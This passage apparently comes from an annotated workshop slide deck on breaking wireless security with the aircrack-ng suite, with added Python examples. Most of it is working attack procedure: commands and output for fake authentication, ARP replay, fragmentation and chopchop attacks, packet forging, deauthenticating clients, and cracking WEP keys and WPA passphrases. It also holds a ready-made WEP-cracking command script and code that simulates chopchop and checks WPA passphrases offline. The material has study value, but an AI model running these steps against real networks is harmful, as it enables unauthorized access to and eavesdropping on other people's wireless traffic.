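    ssid = parse_ies(frame[24 + FIXED_LEN[subtype]:]).get(0)
    if not ssid or ssid == b"\x00" * len(ssid):
        return (kind, None)
    return (kind, ssid.decode("utf-8", "replace"))


def mgmt_frame(subtype: int, a1: bytes, a2: bytes, a3: bytes, fixed: bytes, ssid: bytes) -> bytes:
    """Constructed management frame: header, fixed fields, SSID IE (tag 0), one rates IE (tag 1)."""
    fc = subtype << 4                      # type 0 (management), no flags
    hdr = struct.pack("<HH", fc, 0) + a1 + a2 + a3 + b"\x00\x00"
    return hdr + fixed + bytes([0, len(ssid)]) + ssid + bytes([1, 1, 0x82])


def deauth_frame(bssid: bytes, client: bytes, reason: int = 7) -> bytes:
    """What aireplay-ng -0 sends: a deauthentication to the client, spoofed from the AP."""
    hdr = struct.pack("<HH", 12 << 4, 0) + client + bssid + bssid + b"\x00\x00"
    return hdr + struct.pack("<H", reason)  # 7 = class 3 frame received from nonassociated STA


# Constructed sample traffic around an AP that hides its name.
AP = bytes.fromhex("001b2f3dcbd6")
STA = bytes.fromhex("002127c00771")
BCAST = b"\xff" * 6
CAP = struct.pack("<H", 0x0411)                 # ESS + privacy (WEP) + short slot
BEACON_FIXED = b"\x00" * 8 + struct.pack("<H", 100) + CAP   # timestamp, interval, capabilities
BEACON_HIDDEN = mgmt_frame(8, BCAST, AP, AP, BEACON_FIXED, b"")
BEACON_NUL_CLOAKED = mgmt_frame(8, BCAST, AP, AP, BEACON_FIXED, b"\x00" * 11)
ASSOC_REQ = mgmt_frame(0, AP, STA, AP, CAP + struct.pack("<H", 10), b"Ayam Goreng")
PROBE_REQ = mgmt_frame(4, BCAST, STA, BCAST, b"", b"Ayam Goreng")


def reveal(frames):
    """Run over a capture: any non-None SSID seen is the hidden network's name."""
    seen = [ssid_from_frame(f) for f in frames]
    return seen, {s for _, s in seen if s}


if __name__ == "__main__":
    seen, names = reveal([BEACON_HIDDEN, deauth_frame(AP, STA), ASSOC_REQ, PROBE_REQ])
    for kind, ssid in seen:
        print(f"{kind:24s} SSID={ssid!r}")
    print("revealed:", names)
```

The same parse_ies/ssid_from_frame pair works on real frames pulled from a pcap (skip the radiotap header first); the cloaking check covers both ways APs hide the name, a zero-length element and an element padded with NULs.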
  • 10. Breaking the Simple Defenses: Sniffing Information on the Air (screenshot)
  • 11. Get Closer with the Cracking Tool: Aircrack-ng suite
    Aircrack-ng suite is a set of tools for auditing wireless networks. 4 main tools for today:
    - airodump-ng – used for capturing packets
    - aireplay-ng – used for injection: de-authentication, fake authentication, interactive packet replay, ARP replay, KoreK chopchop, fragmentation
    - packetforge-ng – used for creating packets
    - aircrack-ng – used for recovering keys
  • 12. Get Closer with the Cracking Tool: Decrypt packets with airdecap-ng
    airdecap-ng strips the WEP/WPA encryption from a capture once you have the key (-w <hex WEP key>, or -e <essid> -p <passphrase> for WPA). For WPA it only succeeds on a file that contains the four-way handshake, because the per-session keys are derived from it.
  • 13. Get Closer with the Cracking Tool: Decloak packets with airdecloak-ng
    Cloaking is a technique to disturb the WEP key cracking process. It is done by injecting packets encrypted with random WEP keys into the network; these packets are called "chaff". If the attacker captures these packets and runs the cracker on them, the result will be wrong or there will be no result at all.
    However, the aircrack team developed a tool to deal with this technique, called "airdecloak-ng".
    #airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap
    This command returns two files:
    - workshop-01-filtered.cap: the filtered packets from the specified BSSID
    - workshop-01-cloaked.cap: the cloaked packets from the specified BSSID
  • 14. Get Closer with the Cracking Tool: Aircracking 101
    - PTW attack (-z): aircrack-ng -z capture.cap. Only works for WEP 64/128-bit keys and requires ARP request/reply packets, so you must dump all packets with airodump-ng. (In aircrack-ng 1.x PTW is the default method and -K selects the older KoreK attack; -z is only needed on the 0.9.x releases.)
    - Dictionary attack (WPA/WPA2 passphrases): aircrack-ng -w pass.lst *.cap
    - Fudge factor (-f), which applies to the KoreK attack: once you hit 2 million IVs, try "-f 4", then retry, increasing the fudge factor by 4 each time, all the while collecting more data. Remember the golden rule: "The more IVs the better."
  • 15. Pwning the WEP key (cartoon: WEP, "FFFFFFFFFUUUUUUUUUUUUU--", the hacker)
  • 16. Owned the WEP Key with Simple Technique (No Injection)
    Let's assume that the network has high traffic, so we don't need any of the injection steps.
    Preparation: a device which supports monitor mode and can inject packets into the network.
    My preparation: a 5-year-old laptop – AMD Turion64 1.6GHz, 256MB DDR (still working harmoniously despite...) – Ubuntu Intrepid Ibex 8.10, Broadcom chipset running the legacy b43 driver.
  • 17. Owned the WEP Key with Simple Technique (No Injection): Capturing Method
    How many IVs you need: 64-bit key – about 50,000 IV packets; 128-bit key – about 150,000 IV packets.
    #airodump-ng -w workshop rausb0
    (rausb0 is a Ralink USB adapter on the legacy driver. Adding "-c 11 --bssid xx:xx:xx:xx:xx:xx" keeps the card on the target's channel and limits the capture to that AP.)
    ------------------------------------------------------------------------------------------
    CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx
    BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    xx:xx:xx:xx:xx:xx   77  94    10905  11054    0  11  54.  WEP  WEP    OPN  Workshop
    BSSID              STATION            PWR  Rate   Lost  Packets  Probes
    xx:xx:xx:xx:xx:xx  yy:yy:yy:yy:yy:yy   85  54-54     0     7747
    ------------------------------------------------------------------------------------------
    For a WEP network, #Data is the count of data frames with unique IVs, which is the number aircrack-ng actually works from.
  • 18. Owned the WEP Key with Simple Technique (No Injection): Cracking Method
    #aircrack-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap
    -b xx:xx:xx:xx:xx:xx is the MAC address of the target access point. The successful cracking result looks like this:
    ---------------------------------------------------------------
    Opening workshop-01.cap
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 50417 ivs.
    KEY FOUND! [ 00:11:22:33:44 ]
    Decrypted correctly: 100%
    ---------------------------------------------------------------
    You can start aircrack-ng while airodump-ng is still capturing: as the second line says, it re-reads the file and retries every 5000 new IVs.
  • 19. Owned the WEP Key with Advanced Technique (With Inject Method)
    Let's assume that the network has no traffic at all. The requirements for a packet worth injecting are:
    - The source MAC address is associated with the access point (we can do this by fake authentication).
    - It is sent from a client to the access point (the "To DS" flag is set to 1).
    - The destination MAC address is the broadcast address (FF:FF:FF:FF:FF:FF), so the AP re-broadcasts it, and every re-broadcast is encrypted with a fresh IV.
    The well-known packet that covers all the requirements is the ARP request broadcast. We can divide the injection technique into 2 scenarios: the network has ARP requests, or the network has no ARP requests.
  • 20. Owned the WEP Key with Advanced Technique (With Inject Method): Monitor mode
    Use airmon-ng to put your wifi card into monitor mode and prepare for packet injection:
    #airmon-ng start wlan0 11
    This sets wlan0 to monitor mode on channel 11; we must specify the same channel as the target AP's. (On current aircrack-ng releases the monitor interface is created as wlan0mon, and "airmon-ng check kill" stops the network managers that would otherwise switch the channel back under you.) (cartoon: "Troops. Prepare for assault!" "Affirmative" "I choose YOU!")
  • 21. Owned the WEP Key with Advanced Technique (With Inject Method): Fake Authentication
    We can do fake authentication with the following command:
    #aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
    -a xx:xx:xx:xx:xx:xx is the MAC address of the access point, -h yy:yy:yy:yy:yy:yy the MAC address of our wireless card; "-1 0" authenticates once, with no re-association delay. If it succeeds, our MAC address is associated with the access point:
    ------------------------------------------
    00:00:00 Sending Authentication Request
    00:00:00 Authentication successful
    00:00:00 Sending Association Request
    00:00:00 Association successful :-)
    ------------------------------------------
    If the AP filters MAC addresses, fake authentication fails; in that case give -h the address of a client the AP already accepts (slide 6). After succeeding in fake authentication, we have to determine what type of network we are facing and pick the appropriate steps.
  • 22. Owned the WEP Key with Advanced Technique (With Inject Method): ARP Replay Attack
    We can run the ARP replay attack with the following command:
    #aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
    -b xx:xx:xx:xx:xx:xx is the MAC address of the access point, -h yy:yy:yy:yy:yy:yy the MAC address of our wireless card. aireplay-ng detects an ARP request and replays it automatically; every replay makes the AP send the broadcast again under a new IV.
    ------------------------------------------------------------------------------------
    21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
    Saving ARP requests in replay_arp-0223-210620.cap
    You should also start airodump-ng to capture replies.
    Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps)
    ------------------------------------------------------------------------------------
  • 23. Owned the WEP Key with Advanced Technique (With Inject Method): Fragmentation Attack
    The fragmentation attack recovers a keystream (PRGA) of 1500 bytes without knowing the key, so we can use it to build an encrypted packet of up to 1500 bytes. It works because the first 8 bytes of every data packet are the predictable LLC/SNAP header, which gives 8 bytes of keystream; those bytes are sent back to the AP as a fragmented packet, the AP reassembles and re-encrypts the whole thing under one IV, and the relayed reply yields a longer keystream, repeated until 1500 bytes are known. The command for the fragmentation attack is:
    #aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
  • 24. Owned the WEP Key with Advanced Technique (With Inject Method): Fragmentation Attack
    The system responds with this:
    -------------------------------------------------------------------------------
    21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
    21:21:07 Waiting for a data packet...
    Size: 90, FromDS: 1, ToDS: 0 (WEP)
    BSSID = 00:1B:2F:3D:CB:D6 Dest. MAC = 00:1A:73:37:E2:A3 Source MAC = 00:1B:2F:3D:CB:D6
    0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
    0x0010: 001b 2f3d cbd6 20df 0000 b168 ff00 2872 ../=.. ....h..(r
    0x0020: 7547 d03f 70d7 2d29 1397 7d3d ac16 382a uG.?p.-)..}=..8*
    0x0030: f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263 ..w..c.....(...c
    0x0040: 5315 a328 87cb 0d4a b36a e5be 93c7 307a S..(...J.j....0z
    0x0050: 7bc2 18d7 2df5 94f2 5aed {...-...Z.
    Use this packet ?
    -------------------------------------------------------------------------------
  • 25. Owned the WEP Key with Advanced Technique (With Inject Method): Fragmentation Attack
    We just have to answer yes:
    Use this packet ? y
    And the successful process looks like this:
    ----------------------------------------------------------------------------------
    Saving chosen packet in replay_src-0223-212107.cap
    Data packet found!
    Sending fragmented packet
    Got RELAYED packet!!
    Thats our ARP packet!
    Trying to get 384 bytes of a keystream
    Got RELAYED packet!!
    Thats our ARP packet!
    Trying to get 1500 bytes of a keystream
    Got RELAYED packet!!
    Thats our ARP packet!
    Saving keystream in fragment-0223-212107.xor
    Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
    ----------------------------------------------------------------------------------
  • 26. Owned the WEP Key with Advanced Technique (With Inject Method): Korek ChopChop Attack
    We can run the chopchop attack with this command:
    #aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
    aireplay-ng picks a packet to decrypt; we can choose any packet whose BSSID is our target's. Chopchop does not recover the key: it decrypts one packet byte by byte, using the AP as an oracle that only relays frames whose CRC-32 ICV still verifies.
    --------------------------------------------------------------------------------------
    21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
    Size: 90, FromDS: 1, ToDS: 0 (WEP)
    BSSID = 00:1B:2F:3D:CB:D6 Dest. MAC = 00:1A:73:37:E2:A3 Source MAC = 00:1B:2F:3D:CB:D6
    0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
    0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N
    0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'..
    0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K....
    0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC.
    0x0050: b09b f0f1 8b04 fc1c 0b72 .........r
    Use this packet ?
    ----------------------------------------------------------------------------------------
  • 27. Owned the WEP Key with Advanced Technique (With Inject Method): Korek ChopChop Attack
    Just answer yes:
    Use this packet ? y
    And then the system does the decrypting:
    ---------------------------------------------------------------------------------------
    Saving chosen packet in replay_src-0223-211242.cap
    Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms
    Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms
    Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms
    Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms
    Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms
    Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms
    And so on ...
    The AP appears to drop packets shorter than 40 bytes.
    Enabling standard workaround: IP header re-creation.
    Saving plaintext in replay_dec-0223-211410.cap
    Saving keystream in replay_dec-0223-211410.xor
    Completed in 21s (2.48 bytes/s)
    ---------------------------------------------------------------------------------------
    Each "Offset" line is one recovered byte: xor is the keystream byte, pt the plaintext byte. The "IP header re-creation" line is aireplay-ng's workaround for APs that refuse the very short frames the attack produces near the end. The .xor file is the same kind of keystream the fragmentation attack produces, just shorter (the length of the chosen packet).
• 28. Owned the WEP Key with Advanced Technique (With Inject Method)
Packetforge
To create an encrypted packet from the PRGA (keystream, the .xor file) obtained by the chopchop or fragmentation attack:

#packetforge-ng -0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0223-211410.xor -w arp

(-0 builds an ARP request, -a and -h set the BSSID and source MAC, -k and -l the destination and source IP; 255.255.255.255 works against any AP because the AP rebroadcasts the request to the whole cell. -y names the keystream file and -w the output file.) The result is:
----------------------
Wrote packet to: arp
----------------------
From this command we get an encrypted ARP request packet in a file named "arp". The keystream is only valid for the IV it was recovered under, so packetforge-ng reuses that IV from the .xor file; WEP never prevents an IV from being replayed, so the AP accepts the forged frame as many times as we send it.
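To see what the chopchop run on the previous two slides and the packetforge-ng step actually compute, here is an added example (Python; not from the slides and not aircrack-ng's code) that simulates the whole thing offline. A tiny WEP "AP" that only relays frames with a valid ICV stands in for the real access point; the attacker never sees the key, recovers the full keystream for one IV from a single captured body by chopping one byte at a time, and then forges an encrypted ARP request with that keystream, which is what packetforge-ng -0 does. The 40-bit key 00:11:22:33:44, the IV 55:BC:E6 and the source MAC 00:21:27:C0:07:71 are taken from the slides' demo; the captured payload is constructed.

```python
# Added example (not from the slides): WEP chopchop and packet forging, simulated offline.
import functools
import struct


def _tbl(i):  # one CRC-32 table entry (reflected, poly 0xEDB88320): the ICV algorithm
    for _ in range(8):
        i = (i >> 1) ^ 0xEDB88320 if i & 1 else i >> 1
    return i


T = [_tbl(i) for i in range(256)]
REV = {T[i] >> 24: i for i in range(256)}  # top byte of T[i] -> i (a bijection)


def crc_reg(data: bytes, reg: int = 0xFFFFFFFF) -> int:
    """CRC register after feeding `data`, without the final XOR."""
    for b in data:
        reg = (reg >> 8) ^ T[(reg ^ b) & 0xFF]
    return reg


def icv(msg: bytes) -> bytes:
    return struct.pack("<I", crc_reg(msg) ^ 0xFFFFFFFF)


RESIDUE = crc_reg(icv(b""))  # feeding msg||ICV(msg) always ends here (0xDEBB20E3)


def forge_crc_bytes(start_reg: int, target_reg: int) -> bytes:
    """Four bytes driving the register from start_reg to target_reg (CRC is XOR-linear)."""
    u = target_reg
    for _ in range(4):
        t = REV[u >> 24]
        u = ((u ^ T[t]) << 8) | t
    return struct.pack("<I", start_reg ^ u)


def _chop_fix(guess: int) -> bytes:
    t = REV[RESIDUE >> 24]
    reg = ((RESIDUE ^ T[t]) << 8) | (t ^ guess)  # register of the chopped plaintext
    return forge_crc_bytes(0, RESIDUE ^ reg)      # XOR into its last 4 bytes to revalidate


CHOP_FIX = [_chop_fix(g) for g in range(256)]  # same role as aireplay-ng's chop table


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


@functools.lru_cache(maxsize=None)
def rc4(key: bytes, n: int) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(wep_key: bytes, iv: bytes, msg: bytes) -> bytes:
    pt = msg + icv(msg)  # the body that follows the cleartext IV / key-index header
    return xor(pt, rc4(iv + wep_key, len(pt)))


def make_ap(wep_key: bytes):
    """The oracle: an AP relays a frame whose ICV checks out and drops the rest."""
    def accepts(iv: bytes, body: bytes) -> bool:
        pt = xor(body, rc4(iv + wep_key, len(body)))
        return len(pt) >= 4 and crc_reg(pt) == RESIDUE
    return accepts


def chopchop(iv: bytes, body: bytes, ap_accepts) -> bytes:
    """Recover the keystream for `iv` from one body, last byte first, via the AP oracle."""
    found, c = [], body
    while len(c) > 4:
        chopped, last = c[:-1], c[-1]
        for guess in range(256):
            cand = chopped[:-4] + xor(chopped[-4:], CHOP_FIX[guess])
            if ap_accepts(iv, cand):  # relayed: the chopped plaintext byte was `guess`
                found.append(last ^ guess)
                c = cand
                break
        else:
            raise RuntimeError("no guess accepted; the oracle is not behaving like an AP")
    # A valid 4-byte body is ICV(b"") = 00000000, so its ciphertext is keystream[0:4].
    return bytes(c) + bytes(reversed(found))


def forge_arp_request(keystream: bytes, sender_mac: bytes) -> bytes:
    """packetforge-ng -0 equivalent: an ARP request encrypted with the recovered PRGA."""
    pt = (b"\xaa\xaa\x03\x00\x00\x00\x08\x06"  # LLC/SNAP, ethertype ARP
          + b"\x00\x01\x08\x00\x06\x04\x00\x01" + sender_mac + b"\xff" * 4
          + b"\x00" * 6 + b"\xff" * 4)  # who-has 255.255.255.255 tell 255.255.255.255
    pt += icv(pt)
    assert len(keystream) >= len(pt), "PRGA too short: need %d bytes" % len(pt)
    return xor(pt, keystream)


# Constructed scenario (assumption): key and IV from the slides' demo, 40-byte LLC/SNAP+IP-style payload.
WEP_KEY, IV = bytes.fromhex("0011223344"), bytes.fromhex("55bce6")
CAPTURED = wep_encrypt(WEP_KEY, IV, b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + bytes(range(32)))

if __name__ == "__main__":
    ap = make_ap(WEP_KEY)  # the attacker may call this but never reads WEP_KEY
    ks = chopchop(IV, CAPTURED, ap)
    print("keystream", ks.hex(), "\nplaintext", xor(CAPTURED, ks).hex())
    print("forged ARP accepted:", ap(IV, forge_arp_request(ks, bytes.fromhex("002127c00771"))))
```

Run it with `python3 chopchop_sim.py`. The CHOP_FIX table is the whole trick: after the last byte is cut off, the remaining plaintext's CRC register differs from a valid one by exactly the missing byte, and because CRC-32 is linear over XOR a fixed 4-byte correction per guess makes the shorter frame valid again if, and only if, the guess is right. The simulated AP relays bodies down to 4 bytes, so the first four keystream bytes come out for free; a real AP drops frames shorter than about 40 bytes, which is why aireplay-ng switches to "IP header re-creation" instead of chopping to the end.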
• 29. Owned the WEP Key with Advanced Technique (With Inject Method)
ARP Request Replay with Interactive Attack
We use aireplay-ng's interactive replay (-2) to inject the forged ARP request towards the access point with the following command:

#aireplay-ng -2 -r arp rausb0

And...
-----------------------------------------------------------------------------------
        Size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:1B:2F:3D:CB:D6
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:21:27:C0:07:71

        0x0000:  0841 0201 001b 2f3d cbd6 0021 27c0 0771  .A..../=...!'..q
        0x0010:  ffff ffff ffff 8001 55bc e600 2e4e a334  ........U....N.4
        0x0020:  a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b  ...J..$.&.O&..l;
        0x0030:  ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e  .z*6].%,...dc-S~
        0x0040:  66bf 700e                                f.p.

Use this packet ?
-----------------------------------------------------------------------------------
Note that the frame goes to the AP (ToDS: 1) as a broadcast, and that its IV (55:BC:E6, bytes 0x18 to 0x1a) is the one the keystream was recovered under.
• 30. Owned the WEP Key with Advanced Technique (With Inject Method)
ARP Request Replay with Interactive Attack
Yes is the only option available:
-----------------------
Use this packet ? y
-----------------------
Now aireplay-ng starts injecting the packets:
-------------------------------------------------------
Saving chosen packet in replay_src-0223-211755.cap
You should also start airodump-ng to capture replies.
Sent 1200 packets...(499 pps)
-------------------------------------------------------
And don't forget to start airodump-ng on the same channel, writing to a file: every replayed ARP request is re-encrypted by the AP with a fresh IV when it rebroadcasts it, and the replies it provokes carry more. Those new IVs, not our injected frames, are what aircrack-ng needs.
• 31. Owned the W EP Key with Advanced Technique (With Inject Method)
Cracking WEP Key
#aircrack-ng -z capture1.cap

-z selects the PTW attack (the default in aircrack-ng 1.0 and later), which works on the ARP traffic the replay generated and needs far fewer IVs than the older FMS/KoreK statistical attacks. The successful cracking result is the following:
---------------------------------------------------------------
Opening capture1.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.

KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
The key shown is a 40-bit (64-bit WEP) key. aircrack-ng can be left running against the growing capture file; it restarts the attack automatically every 5000 new IVs, so there is no need to stop the replay first.
• 32. Conclusion
Scripts for Cracking WEP
$AP is the Access Point MAC address
$WIFI is the WiFi card MAC address

airmon-ng start wlan0 11        (specify the channel when enabling monitor mode)
airodump-ng -c 11 -w capture1 wlan0
aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
aireplay-ng -4 -b $AP -h $WIFI wlan0
If it's not working, try:
aireplay-ng -5 -b $AP -h $WIFI wlan0
packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay.xor -w arp
aireplay-ng -2 -r arp wlan0
aircrack-ng -z capture1-01.cap

Notes: airodump-ng's -w takes a file prefix, not a file name, and writes capture1-01.cap (the original "-w capture1.cap" would have produced capture1.cap-01.cap, which the last line would not find). -e linksys is the target's ESSID, and replay.xor stands for the replay_dec-*.xor file that the chopchop (-4) or fragmentation (-5) attack wrote. Depending on the driver, airmon-ng either puts wlan0 itself into monitor mode or creates a separate monitor interface (mon0); the remaining commands must use whichever interface is in monitor mode.
• 33. Owned the WPA-PSK/WPA2-PSK Key
The idea for cracking a pre-shared key is to capture the four-way handshake (the EAPOL-Key frames exchanged when a client joins). The PSK itself never crosses the air, but the handshake carries both nonces and a MIC computed with keys derived from the PSK, which is enough to test candidate passphrases offline, one PBKDF2 derivation at a time.
• 34. Owned the WPA-PSK/WPA2-PSK Key
We are able to do this by de-authenticating an associated client. This forces the client to re-authenticate, and we capture the four-way handshake from that process (airodump-ng must be running on the AP's channel and writing a capture file; its status line reports "WPA handshake: <BSSID>" once it has the frames).
The command for de-authentication is:

#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0

(-0 1 sends a single round of deauthentication frames, -a is the BSSID, -c the MAC of the client to kick.)
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]

The ACK counters at the end show whether the client and the AP actually heard the frames; 0|0 ACKs usually means the card is on the wrong channel or the client is out of range, and no handshake will follow.
• 35. Owned the WPA-PSK/WPA2-PSK Key
#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap

Opening workshop-02.cap
Read 252 packets.

   #  BSSID              ESSID                     Encryption
   1  xx:xx:xx:xx:xx:xx  Workshop                  WPA (1 handshake)

Choosing first network as target.

Opening workshop-02.cap
Reading packets, please wait...

                                 Aircrack-ng 1.0 rc1 r1085

                   [00:00:00] 0 keys tested (0.00 k/s)

                          KEY FOUND! [ TheFuckinWPAKey ]

      Master Key     : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4
                       E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63

      Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6
                       61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2
                       9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86
                       2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1

      EAPOL HMAC     : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D

Master Key is the PMK derived from the passphrase and the SSID, Transcient Key is the PTK derived from the PMK, the two MACs and the two handshake nonces, and EAPOL HMAC is the MIC that every candidate passphrase is checked against. The only defence is passphrase strength: each candidate costs the attacker one 4096-round PBKDF2 computation and nothing more, and the capture can be attacked for as long as anyone cares to.
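The derivation and check that aircrack-ng performs on the three slides above, as an added Python example (not from the slides and not aircrack-ng's code). It constructs message 2 of a WPA2 four-way handshake for the slides' SSID, passphrase and MACs with both nonces fixed here (an assumption, so the run is reproducible), then recovers the passphrase from a small wordlist the same way the -w run does: PBKDF2 to the PMK, PRF-512 to the PTK, HMAC over the EAPOL frame, compare with the captured MIC. The "password"/"IEEE" PSK test vector it is checked against is the one published in IEEE 802.11i Annex H.

```python
# Added example (not from the slides): the offline check aircrack-ng runs on a captured
# WPA/WPA2-PSK four-way handshake, against a handshake constructed here.
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK (aircrack's "Master Key") = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512(PMK, "Pairwise key expansion", min/max of the MACs || min/max of the nonces).
    The first 16 bytes are the KCK, the key that signs the EAPOL-Key frames."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


MIC_OFF = 81  # EAPOL-Key: 4 (802.1X hdr) + 1 + 2 + 2 + 8 + 32 (nonce) + 16 + 8 + 8, then the 16-byte MIC


def eapol_mic(kck: bytes, eapol: bytes, wpa2: bool = True) -> bytes:
    """MIC over the frame with its MIC field zeroed: HMAC-SHA1 for WPA2 (key descriptor
    version 2), HMAC-MD5 for WPA/TKIP (version 1), truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFF] + b"\x00" * 16 + eapol[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def build_msg2(snonce: bytes, kck: bytes, wpa2: bool = True) -> bytes:
    """Handshake message 2 (STA -> AP): carries SNonce and the first MIC; key data omitted."""
    key_info = 0x010A if wpa2 else 0x0109  # MIC | Pairwise | descriptor version 2 or 1
    body = b"\x02" + struct.pack(">HHQ", key_info, 16, 1) + snonce + b"\x00" * 48 + b"\x00\x00"
    frame = b"\x01\x03" + struct.pack(">H", len(body)) + body
    return frame[:MIC_OFF] + eapol_mic(kck, frame, wpa2) + frame[MIC_OFF + 16:]


def crack_psk(wordlist, ssid, ap_mac, sta_mac, anonce, msg2, wpa2=True):
    """Try every candidate passphrase; the MIC in message 2 is the verifier."""
    snonce, mic = msg2[17:49], msg2[MIC_OFF:MIC_OFF + 16]
    for cand in wordlist:
        kck = ptk(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2, wpa2), mic):
            return cand
    return None


# Constructed scenario (assumptions): SSID, key, AP and client MACs from the slides' demo;
# the nonces are fixed here so the run is reproducible (ANonce normally comes from message 1).
SSID, PASSPHRASE = "Workshop", "TheFuckinWPAKey"
AP_MAC, STA_MAC = bytes.fromhex("001b2f3dcbd6"), bytes.fromhex("001a7337e2a3")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))


def captured_msg2() -> bytes:
    """Stand-in for the frame airodump-ng writes to the .cap after the deauth forces a rejoin."""
    kck = ptk(pmk_from_passphrase(PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, kck)


if __name__ == "__main__":
    words = ["12345678", "password", PASSPHRASE, "letmein1"]  # stand-in for -w wordlist
    print("KEY FOUND!", crack_psk(words, SSID, AP_MAC, STA_MAC, ANONCE, captured_msg2()))
```

Message 1 (ANonce) plus message 2 is all a cracker needs, which is why aircrack-ng reports "(1 handshake)" after a single rejoin. Everything in the loop is keyed by the candidate, so the cost per guess is dominated by the 4096 PBKDF2 rounds, and no amount of capture data makes it cheaper.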
• 36. Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
Most companies have moved to certificate-based 802.1X authentication (EAP-TLS, EAP-TTLS, PEAP) for their wireless networks and assume it is perfectly safe.
But an attacker can still break in by spoofing the server certificate. This method takes advantage of client incaution: many supplicants are configured to accept any server certificate, or the user clicks through the warning, without checking whether it is genuine.
